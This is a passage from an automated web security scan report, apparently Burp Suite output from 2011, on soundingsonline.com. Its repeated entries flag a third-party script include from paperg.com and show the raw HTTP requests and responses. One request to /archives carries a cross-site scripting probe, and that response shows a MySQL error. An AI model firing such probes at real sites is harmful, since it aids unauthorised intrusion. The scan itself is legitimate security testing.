       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1261. http://www.soundingsonline.com/archives

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:27:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:27:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1262. http://www.soundingsonline.com/boat-shop

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1263. http://www.soundingsonline.com/boat-shop/know-how

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/know-how HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1264. http://www.soundingsonline.com/boat-shop/new-boats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/new-boats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1265. http://www.soundingsonline.com/boat-shop/new-gear

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/new-gear HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1266. http://www.soundingsonline.com/boat-shop/on-powerboats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/on-powerboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1267. http://www.soundingsonline.com/boat-shop/on-sailboats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/on-sailboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1268. http://www.soundingsonline.com/boat-shop/q-a-a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/q-a-a HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1269. http://www.soundingsonline.com/boat-shop/sea-savvy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/sea-savvy HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1270. http://www.soundingsonline.com/boat-shop/tech-talk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/tech-talk HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1271. http://www.soundingsonline.com/boat-shop/used-boat-review

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/used-boat-review HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1272. http://www.soundingsonline.com/calendar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /calendar HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1273. http://www.soundingsonline.com/career-opportunities

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /career-opportunities HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1274. http://www.soundingsonline.com/columns-blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1275. http://www.soundingsonline.com/columns-blogs/bay-tripper

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/bay-tripper HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1276. http://www.soundingsonline.com/columns-blogs/books

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/books HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
